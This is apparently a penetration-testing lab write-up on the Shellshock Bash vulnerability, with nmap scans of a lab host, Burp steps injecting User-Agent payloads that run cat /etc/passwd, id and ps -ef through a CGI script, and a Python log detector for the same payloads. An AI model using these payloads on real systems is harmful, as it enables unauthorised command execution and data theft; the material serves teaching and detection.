Linux Vulnerabilities
Shellshock (CVE-2014-6271)
Shellshock (CVE-2014-6271) is the name given to a family of vulnerabilities in the Bash shell (present since V1.3) that allow an attacker to execute arbitrary commands remotely via Bash, and consequently to obtain remote access to the target system via a reverse shell.
The Shellshock vulnerability was discovered by Stéphane Chazelas on the 12th of September 2014 and was made public on the 24th of September 2014.
Bash is a Unix-like (*nix) shell that is part of the GNU project and is the default shell on most Linux distributions.
Initial Scan
┌──(root㉿INE)-[~]
└─# sudo nmap -A demo.ine.local
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-11-29 20:17 IST
Nmap scan report for demo.ine.local (192.181.152.3)
Host is up (0.000067s latency).
Not shown: 999 closed tcp ports (reset)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.6 ((Unix))
|_http-title: Site doesn't have a title (text/html).
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.6 (Unix)
MAC Address: 02:42:C0:B5:98:03 (Unknown)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
Network Distance: 1 hop
TRACEROUTE
HOP RTT ADDRESS
1 0.07 ms demo.ine.local (192.181.152.3)
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.76 seconds

A CGI script, /gettime.cgi, is running on the target server.

Shellshock Nmap scan
nmap --script http-shellshock --script-args "http-shellshock.uri=/gettime.cgi" demo.ine.local 
Exploitation with Burp
Start Burp Suite, navigate to proxy, and turn on the intercept.
Reload the page and intercept the request with Burp Suite.
Right-click, select the “Send to Repeater” option, and navigate to the Repeater tab.

Modify the User-Agent header and inject the malicious payload.
Payload:
() { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd'
The command executed successfully.
Modify the payload to execute the ‘id’ command.
Payload:
() { :; }; echo; echo; /bin/bash -c 'id'
Modify the payload to execute the ‘ps -ef’ command.
Payload:
() { :; }; echo; echo; /bin/bash -c 'ps -ef'
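Every one of the Repeater requests above leaves a trace in the Apache access log, because the User-Agent (and Referer) are written to the combined log format. As an added example that is not part of the original lab, the following Python script parses constructed access-log lines (the sample entries are invented, modelled on the requests above) and flags entries whose User-Agent or Referer begins with the Bash function-definition prefix `() {` that CVE-2014-6271 relies on, noting whether the request targeted a CGI path. The log lines, hostnames and the `Finding` type are assumptions for the demonstration.

```python
import re
from dataclasses import dataclass

# Apache "combined" log format: host ident user [time] "request" status bytes "referer" "user-agent"
COMBINED_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<bytes>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# Vulnerable Bash only imported an environment variable as a function when its value
# BEGAN with "() {", so the check is anchored at the start of the header value.
# Whitespace between "()" and "{" is allowed here to catch minor variants.
SHELLSHOCK_RE = re.compile(r'\(\)\s*\{')

# Constructed sample lines (not taken from the lab). Line 2 mirrors the User-Agent payload
# above; line 3 carries it in the Referer; line 4 has the token mid-string and is not a probe.
SAMPLE_LOG = """\
10.0.0.5 - - [29/Nov/2025:20:20:01 +0530] "GET /gettime.cgi HTTP/1.1" 200 45 "-" "Mozilla/5.0 (X11; Linux x86_64)"
10.0.0.9 - - [29/Nov/2025:20:21:17 +0530] "GET /gettime.cgi HTTP/1.1" 200 1821 "-" "() { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd'"
10.0.0.9 - - [29/Nov/2025:20:21:40 +0530] "GET /index.html HTTP/1.1" 200 312 "() { :;}; /bin/bash -c 'id'" "curl/7.88.1"
10.0.0.7 - - [29/Nov/2025:20:22:03 +0530] "GET /gettime.cgi HTTP/1.1" 500 0 "-" "Mozilla/5.0 () { not a function }"
"""

@dataclass
class Finding:
    host: str
    time: str
    path: str
    field: str        # which header carried the pattern ("agent" or "referer")
    cgi_target: bool  # True when the request path looks like a CGI handler (exposed via the env)

def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = COMBINED_RE.match(line)
    return m.groupdict() if m else None

def is_cgi_path(path):
    return path.endswith(".cgi") or "/cgi-bin/" in path

def detect_shellshock(log_text):
    """Return one Finding per entry whose User-Agent or Referer starts with a Bash function definition."""
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        parts = rec["request"].split()
        path = parts[1] if len(parts) > 1 else rec["request"]
        for field in ("agent", "referer"):
            if SHELLSHOCK_RE.match(rec[field]):
                findings.append(Finding(rec["host"], rec["time"], path, field, is_cgi_path(path)))
    return findings

if __name__ == "__main__":
    for f in detect_shellshock(SAMPLE_LOG):
        print(f"{f.time} {f.host} {f.field}->{f.path} cgi={f.cgi_target}")
```

Findings against CGI paths are the ones to escalate first; the host-level confirmation is the presence of an unpatched Bash, which the Nmap http-shellshock script above tests for directly.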